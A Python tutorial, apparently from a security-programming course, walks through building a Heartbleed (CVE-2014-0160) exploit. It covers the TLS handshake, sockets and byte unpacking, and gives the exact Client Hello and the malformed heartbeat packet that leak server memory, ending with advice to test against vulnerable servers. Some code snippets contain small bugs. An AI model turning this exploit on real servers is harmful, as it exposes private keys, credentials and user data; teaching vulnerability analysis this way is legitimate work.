Exploiting CVE-2014-0160

CVE-2014-0160 known as the Heartbleed Bug is a vulnerability in the OpenSSL cryptographic library. The weakness allowed an attacker to steal information that under normal circumstances would be encrypted using SSL/TLS.

This allowed an attacker on the Internet to read the memory of the systems protected by the vulnerable version of the OpenSSL software. Basically, it allowed an attack the ability to eavesdrop on data sent directly from the server.

XKCD for better or worse has summarised the Heartbleed vulnerability in his web comic:

Are you still there, server? It's me, Margaret

Technically CVE-2014-0160 was caused by a missing bounds check for memcpy() call that used non-sanitised user input as the length parameter. This meant that an attacker could tell OpenSSL to allocate a 64 KB buffer but copy more bytes than required into the buffer and send that buffer back to the attacker leaking the contents of the victim’s memory in 64 KB increments.

SSL/TLS Handshake Overview

Computers tend to be very proper. When a computer meets a server for the first time, it will very often attempt to shake its hand. Unknown to the human eye this handshake allows the two computers to negotiate the terms of their communication. This can include:

  • The version of the protocol to use

  • The cryptographic algorithm to use

  • Authenticate each other by exchanging and validating digital certificates

  • Using asymmetric encryption techniques to generate a shared secret key that allows the client and server to securely communicate

There are a number of attacks that theoretically and practically be executed if the server is configured with weak SSL/TLS cipher suites are used, or if older protocols are available for use.

This section does not aim to provide you with a byte-by-byte coverage of how an handshake occurs, but hopefully gives you a general overview:

Overview of the SSL/TLS handshake
  1. The SSL/TLS client sends a client “hello” message that lists cryptographic information such as SSL/TLS version in the client’s order of preference as well as the cipher suites supported by the client. The message will also contain a random byte string that is used in following computations. The protocol selected may also allow for the client hello to include information about data compression (if supported).

  2. The SSL/TLS server responds with a server “hello” message that contains the cipher suites chosen by the server from the list provided by the client the session ID, and another random byte string. The server will also send its digital certificate. If the server name requires a digital certificate for client authentication, the server will also send a request that includes the type of certificates supported as well as a list of accepted CAs.

  3. The client verifies the server’s digital certificate.

  4. The client then sends the random byte string that allows the client and the server to compute the secret key to be used for encrypting any following data. The random byte string is encrypted with the server’s public key.

  5. If the server sent a client certificate request the client sends a random byte string encrypted with the client’s private key along with the client’s digital certificate, or a no digital certificate alert. This alert is only a warning, however with some configurations can cause the handshake to fail.

  6. The server verifies the client’s provided certificate.

  7. The client sends the server a finished message, which is encrypted with the secret key, indicating that the client part of the handshake is complete.

  8. The server sends the client a finished message, which is encrypted with the secret key, indicating that the server part of the handshake is complete.

  9. For the duration of the SSL/TLS session, the server and client can exchange messages that are symmetrically encrypted with the shared secret key.

The Anatomy of an SSL/TLS Client Hello

Overview of the SSL/TLS Client Hello

The image above is an SSL/TLS Client Hello from my computer to my blog. Using Wireshark a widely-used network protocol analyser you can see the request your computer makes and determine what each hexadecimal value is or represents.

You don’t need to understand this diagram to understand how Heartbleed works, but may help you understand the Client Hello we use later on.

Screenshot of Wireshark

What is a Port?

Aside from a town with a harbour or access to navigable water where ships load or unload. When talking about the Internet, a software or network port is a location where information is sent. For example, SSL/TLS is often on TCP Port 443 while unencrypted HTTP traffic is often on TCP Port 80.

There are a total of 65,535 ports for TCP and an additional 65,535 ports for UDP meaning any one server has a total of 131,070 ports. Keep in mind, some of these ports are reserved for specific applications or protocols, these are between 0 and 1023 which are often referred to as “reserved ports” and were allocated by IANA.

List of Well-Known and Reserved Ports

If you cannot recognise any of these ports that’s 100% fine! You just learnt a bunch of new ones!

List of common ports

A Recipe for Broken Hearts

Concepts Covered

  • Using the socket library

  • Using the ssl library

  • SSL/TLS

  • Using named parameters

  • Using Control Flow Tools

  • Endians

  • Understanding and using RFCs

  • Encoding and Decoding Network Protocols

  • Networking Basics

  • Basic Data Types

  • Logic Flows

Ingredients

  • One python file called main.py or yourprojectname.py

  • One dash of argparse, a Python “built-in” meaning you don’t need to install anything

  • One cup of sweet ASCII font from

  • One helping of TLS “hello” handshake

  • A handful of TLS “heartbeats”

  • A liberal helping of Python sockets

Method

Like we discussed when we were building the subdomain bruteforcer, the first step is to create a command center, or a way for your user to interact with your tools. For this tool we need two initial arguments:

  • an option to provide a domain name

  • an option to provide a port

Once we know the host and port we want to connect to, we will use the socket library a low-level networking interface.

You may be thinking we will be using the requests library as we did previously, this is not the case as the HTTP is an application-level protocol for distributed, collaborative, hypermedia information (like websites). It is stateless, generic and is for most part multi-purpose.

Sockets on the other hand are a two-way communication link between two applications on a network. It is bound to a port number so the TCP can identify the application the destination the data should be sent to.

In the OSI model (shown below) HTTP falls into the application layer, while sockets are within the transport layer.

Open Systems Interconnection model

We won’t be getting too much into the socket library because it is quite deep and complex rabbit-warren. However, more resources are provided under Further Reading.

For now we will create a new socket under our command line option specifying we want to communicate with IP (Internet Protocol)`v4 (``socket.AF_INET` using TCP (socket.SOCK_STREAM).

socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

Hint

It is often easier to add logging and documentation as you go rather than having to come back to it at a later stage.

Using our newly created socket socks we want to connect to the host and port the user specified. The socket.connect() function accepts a tuple a data-structure we haven’t really covered yet.

Warning

You might be thinking “Calling the variable ``socks`` instead of ``socket`` is silly! and I would tend to agree with you, however, with great programming power comes great responsibility and that responsibility is ensuring you don’t “shadow” i.e. name variables after “built-in types”. This can lead to side effects and issues later when the interpreter tries to use an actual socket and you have a variable called socket as well.

So, what are tuples? Tuples (pronounced like “toople” or “tupple”) are collections or sequences similar to lists. The difference being tuples cannot be changed (immutable). The other distinction is that tuples are surrounded by parentheses (()), rather than (square) brackets ([])

Note

To write a tuple containing a single value you have to include a trailing comma, even though there is only one value:

my_tuple = (50, )

To pass the hostname and port we are attacking to the socket object we would write:

s.connect((args.host, args.port))

As mentioned previously, computers are very formal and like to follow “social norms” so now that we have established a connection to the server, we need to say “hello” and basically negotiate with our server how we are going to securely communicate.

This can be done with the following SSL/TLS handshake:

16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01

This can be included as a “global” variable, or a variable that can be accessed anywhere in your application by adding it to the top of your file, or you can pick to read it in from a file.

To add a “global” variable:

#!/usr/bin/python

import argparse
import socket
# other imports

# globals declared
HELLO = "hello there"

Warning

Using globals and the global statement is considered a programming “anti-pattern” as they can be accessed at the same time by different functions which can frequently result in bugs.

Global variables can also make code difficult to read as very often you need to search through multiple functions to understand all the different locations that global variables are used and modified.

Hint

If you are using a global variable you may notice you have a small problem. Python strings using talking-marks (" or ') don’t span multiple lines you may have solved this problem by making a really long string, or by concatenating them We can avoid this problem using what is referred to as a triple-quote string literal using either " or ' as shown in the example below:

#!/usr/bin/python

import argparse
import socket
# other imports

# globals declared
HELLO = """16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf"""

Once we have the hello loading into our application, either via reading a file, or by using a global variable we will need to convert the string into binary. While this may seem like a simple enough task, keep in mind the value we have is not a true hexadecimal (base-8) value, but rather a string representation of it, so before we can convert it, we need to process that string.

You will want to write a function that does several things:

  • Remove all the spaces in the original string

  • Remove all the \n characters

  • Decode the hexadecimal to bytes

Using what we learnt in the “Handling Word Lists” section I will leave the first two points up to you. Decoding the hexadecimal to bytes is a straight-forward process once you know what you are trying to do. For this we are going to use the built-in bytes.fromhex().decode():

return bytes.fromhex(hello_payload)

In the example above we are converting our hello_payload from hexadecimal to bytes.

Bytes have come up a couple of times now, and you are probably thinking, what the heck is a byte or in Python Byte Object. To put it simply, a Byte Object is a sequence of bytes (clear right?) while Strings (str) are a sequence of characters. This makes a Byte Object a machine-readable form, whereas Strings are human-readable. Furthermore, this allows Byte Object``s to be stored directly to disk while a String needs to be encoded into a ``Byte Object.

If you were to print the output of the SSL/TLS Client Hello you would get something like:

SC[r  +H9
w3f
32ED/A      I  #

Now that we have a converter for hex to bytes, we want to pass our client hello through this function before assigning it to the hello variable. This can be done as follows:

# hex2byte is what I called my function to convert hex to bytes

hello = hex2byte('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

Now that we have our Client Hello in a computer readable format, we can send the hello to the server using the send() command:

socks.send(hello)

The send command will only work if we were able to successfully connect to the socket in the previous step. Returning the number of bytes sent.

Now that we have sent the Client Hello, we need to monitor the response from the server we are communicating with, a simple way of doing this is using while True. This allows us to continue polling for a response to our Client Hello, as responses can be slow or incomplete on the first attempt to receive them.

At this point the data, or bytes returned from the server are now sitting in the network buffer in the operating system’s queue waiting to be processed. To do this we can use socket.recv() which as the name suggests allows us to receive that data from the queue.

The recv() function takes two arguments, first a number of bytes to return from the queue, and an array of flags.

Note

The flags available for use with recv() aren’t critical for you to know right now, if you are curious you can find more information in the manual (man) page for the UNIX recv(2) command which on OS X and UNIX can be accessed by using man recv. Alternatively, you can browse man page entries at man7.org.

We could just ask the socket to return the full size of the packet, however we only need the first five bytes to return the content type, version, and length:

with True:
    handshake_response = socks.recv(5)

Unfortunately, our handshake_response is not in a human readable format:

>>> print(handshake_response)
b'\x15\x03\x02\x00\x02'

We will need to unpack the response, so it is usable. We can do this using the struct.unpack() function. struct.unpack() takes two arguments a format and a buffer. The buffer in this case would be our handshake_response.

There are several formats, and therefore format characters you can pick from when packing and unpacking data, these are listed below, however we will be focusing on two specific one’s B (unsigned char) and H (unsigned short).

Format

C Type

Python type

Standard size

x

pad byte

no value

c

char

bytes of length 1

1

b

signed char

integer

1

B

unsigned char

integer

1

?

_Bool

bool

1

h

short

integer

2

H

unsigned short

integer

2

i

int

integer

4

I

unsigned int

integer

4

l

long

integer

4

L

unsigned long

integer

4

q

long long

integer

8

Q

unsigned long

long integer

8

n

ssize_t

integer

N

size_t

integer

e

binary16

float

2

f

float

float

4

d

double

float

8

s

char[]

bytes

p

char[]

bytes

P

void *

integer

Because we are unpacking data, we also need to be aware of the data endian. Endianness is the sequential order that bytes are arranged when stored in memory or when transmitted over digital links. In computing, there are two competing representations - big-endian and little-endian.

A good analogy I found on Stack Overflow explained endianness like this:

Consider they way I communicate with you. My native language might be Spanish and who knows what goes on in my brain. Internally, I might represent the number three as “tres” or some weird pattern of neurons. Who knows? But when I communicate with you, I must represent the number three as “3” or “three” because that’s the protocol you and I have agreed to, the English language. So unless I’m a terrible English speaker, how I internally store the number three won’t affect my communication with you.

This is the same way you should look at what we are doing with endians now, we are receiving that information and meaningfully storing in within our brain!

Little Endian

Diagram of how a 32-bit integer is arranged in memory when stored from a register on a little-endian computer system.

Big Endian

Diagram of how a 32-bit integer is arranged in memory when stored from a register on a big-endian computer system.

Of course there is more to endianness than just “lol its things in different orders” however, for now all you need to know is: 1. endianness is important and 2. when unpacking the data from the server, we want to use big-endian.

When specifying the byte-order, size, or alignment in Python there are a number of characters we can use to specify this. By default, the representation is done in the machines native format and byte order, however this is sometimes undesirable and so by using the first character of our format string can be used to indicate the byte order, size and alignment of the packed data.

Format

Byte Order

@

native

=

native

<

little-endian

>

big-endian

!

network (= big-endian)

So, when we unpack the handshake_response we need to know what we are unpacking that way we can specify what each type is. If you recall the SSL/TLS Handshake Overview earlier, you will note that the server will send a similar hello. In C these would be made up of an unsigned char (1 byte), and two unsigned shorts (2 bytes each) all of which are represented as ints in Python. This would make our unpack format >BHH.

Our full command would look something like:

>>> (content_type, version, length) = struct.unpack('>BHH', handshake_response)

Previously we used, recv() to fetch a number of bytes from the network buffer in the operating system’s queue, however, now we want to fetch all bytes in the buffer. Python doesn’t have this feature; however, a number of people have tried to add it in the past. So we are going to create our own!

def recvall(sock, count):
buf = b''
while count:
    new_buffer = sock.recv(count)
    if not new_buffer: return None
    buf += new_buffer
    count -= len(new_buffer)
return buf

The TCP stream affords us some luxury in that we know the bytes of data will not arrive out of order and be send no more than once. However, we don’t know how much data we should expect to receive or how it will be sent, that is will it be sent in 4 x 10-byte packets or sent all at once? To solve this, we can use a while loop.

The way this implementation works is based on the length (passed in via count) it will attempt to retrieve information from the socket until the count is zero, or there is no information in the buffer. While this is not the most eloquent way of writing a recvall function it works for our purposes.

Now that we have a function that allows us to recall the remaining information in the buffer, we can put this to good use fetching the remining parts of the handshake from the network buffer:

handshake_response = recvall(socks, length)

To help with understanding what is going on, now is as good a time as any to add a print statement or logging entry to print the content type, version, and length. If you want to provide more verbose information such as what each value means we have included a number of helpful cross-references below:

Record Type

Type

Decimal

Hexadecimal

Handshake

22

0x16

Change Cipher Spec

20

0x14

Alert

21

0x15

Application Data

23

0x17

Handshake Records

Type

Decimal

Hexadecimal

Hello Request

0

0x00

Client Hello

1

0x01

Server Hello

2

0x02

Certificate

11

0x0B

Server Key Exchange

12

0x0C

Certificate Request

13

0x0D

Server Hello Done

14

0x0E

Certificate Verify

15

0x0F

Client Key Exchange

16

0x10

Finished

20

0x14

Heartbeat

24

0x18

SSL/TLS Version

Type

Hexadecimal

TLSv2

0x0002

SSLv3

0x0300

TLSv1.0

0x0301

TLSv1.1

0x0302

TLSv1.2

0x0303

TLSv1.3

0x0304

Now need to inspect the content type we received from the server, specifically, we want to make sure our content type is a handshake, and the first byte of the handshake we got from our recvall function is 0x0E or Server Handshake Done.

The first step we need take, is getting the first character from the handshake returned by recvall and finding a way to convert it to a hexadecimal value. It sounds complicated, but Python has made this a relatively painful process using the hex() function.

But how do we get the first character of the handshake? Strings in Python can sort of be accessed like lists, meaning that if we want the first character we can can simply use mystring[0]. It means that we can access any character in the string if we know the index. Therefore, we can write something like:

record_type = hand[0]
record_ordinal = hex(record_type)

To put it more succinctly:

record_ordinal = hex(hand[0])

Now that we have the ordinal of the first character, we can check that out content type and record type match what we need to continue with exploiting Heartbleed.

There are several ways we can test multiple conditions, while some people may pick to nest if statements a more compact way is using a logical operator.

Operator

Description

Example

Logical and

If both a and b are True or non-zero, the condition is True

a = 10, b = 20, a and b would return True

Logical or

If either of the two variables are True or non-zero, the condition is True

a = False, b = True, a or b would return True

Logical not

Used to reverse the logical state of and and or

a = 10, b = 20, not a and b would return False

Keeping our logical operators in mind we are looking for two conditions to be True at the same: if content_type == 22 and that our record_ordinal equals 0x0E:

record_ordinal = hex(hand[0])
if content_type == 22 and record_ordinal == 0xe:

For a more compact version, we can directly test the result of hex(hand[0]):

if content_type == 22 and hex(hand[0]) == 0xe:

Warning

One thing that often still catches me off guard is letter case. It is important to check the case the function returns and to normalise it to ensure validation works as expected.

Now that we know the handshake is complete, we can move onto exploiting the server, so we want to break the while True loop.

The break statement allows you to break out of the innermost enclosing for or while loop. Loops can also have an else clause that allows us to run some action after the loop terminates due to exhaustion of the list rather than when you specifically break.

for animal in animals:
    if animal == "duck":
        break

continue on the other hand continues with the next iteration of the loop, which can be helpful if you are looking for particular qualities for example even and odd numbers.

for animal in animals:
    if animal == "duck":
        print("Quack Quack! We found the duck!")
        break
    elif animal == "llama":
        print("*llama noises* We found the llama!")
        continue
    else:
        print(f"Unknown animal: {animal}")

Another important flow control statement is the pass statement which does nothing. It can be used when a statement is syntactically required but no action should be taken, for example as a place-holder for functional or conditional bodies that have not yet been populated.

for animal in animals:
    if animal == "duck":
        print("Quack Quack! We found the duck!")
        break
    elif animal == "llama":
        print("*llama noises* We found the llama!")
        continue
else:
    print("What sort of farm is this? A duck and llama farm!")

You should now have something like:

if content_type == 22 and hex(hand[0]) == 0x0E:
    break

You will now want to include a heartbeat packet in the same way you included the original hello message, either with a file or a global variable you can use.

A heartbeat packet looks like:

18 03 02 00 03
01 40 00

Value

Description

18

Indicates a heartbeat record

03 02

The SSL/TLS version

00 03

Length of the packet

01

Heartbeat request

40 00

Payload length should be 16, 384 bytes as specified by RFC 6520

So now is where we begin to write the code that will actively exploit Heartbleed. The first thing you will want to do is create a new function that takes the socket you previously created.

The first thing we want to do is using the socket we pass in, send the heartbeat payload we just created. This can be done in the same way that we sent the original client hello using the socks.send() function.

You might get a bit of deja vu from the next part, as we use the socks.recv(5) to pull the first five bytes from the network buffer. The difference being before we unpack the content (in the same way we did last time) we will check if it not None. If it is, you should add some logging at the appropriate level to let the user know and either terminate the application, or if you are extending it to add support for multiple domains and ports, to return and move onto the next combination.

If the value is not None it means we can move on to unpacking the contents, in the exact same way we did before!

From here he will be doing several relatively simple checks against the contents we received as well as other information provided by the server. Using the knowledge of content types, and sockets you will want to write code that accomplishes the following:

  • Checks that the content type is not None and if it is, handle either returning or terminating

  • Retrieve the remaining content from the network buffer using the recvall() function and check that the content does not equal None

  • Check the content type is that of a heartbeat and if it is dump the contents (dumping the contents is covered in the next section so use the appropriate flow control call to handle this)

  • Check the content type is that of an alert and if it is dump the contents (dumping the contents is covered in the next section so use the appropriate flow control call to handle this)

  • Check the length of the response returned against the length specified in our heartbeat call (hexadecimal: 00 03).

Dumping the contents of the payload is the last thing you need to do for this exploit to be successful. You should always provide a dump of the information whether the exploit is successful or not as it can provide useful information such as why the exploit may have failed, or just as proof that the exploit was successful.

There is conveniently a Python library that can convert our sockets hexadecimal information into a “pretty printed” version for you. It can be installed using pipenv install hexdump.

The usage is also straight forward, where s is our socket object:

>>> dump(s, size=2, sep='-')
02-46
>>> dump(s, size=2, sep=' ')
02 46
>>> dump(s, size=4, sep=' ')
0246

The size variable determines specifies length of text chunks while the sep determines what is used to represent the divider between each chunk. When dumping network information, we traditionally use a size of two, with a space sep.

You can now start testing your code against vulnerable servers! A useful resource for debugging potential issues is RFC 5246 the TLS documentation - specifically Appendix A.3 which covers Alert Messages.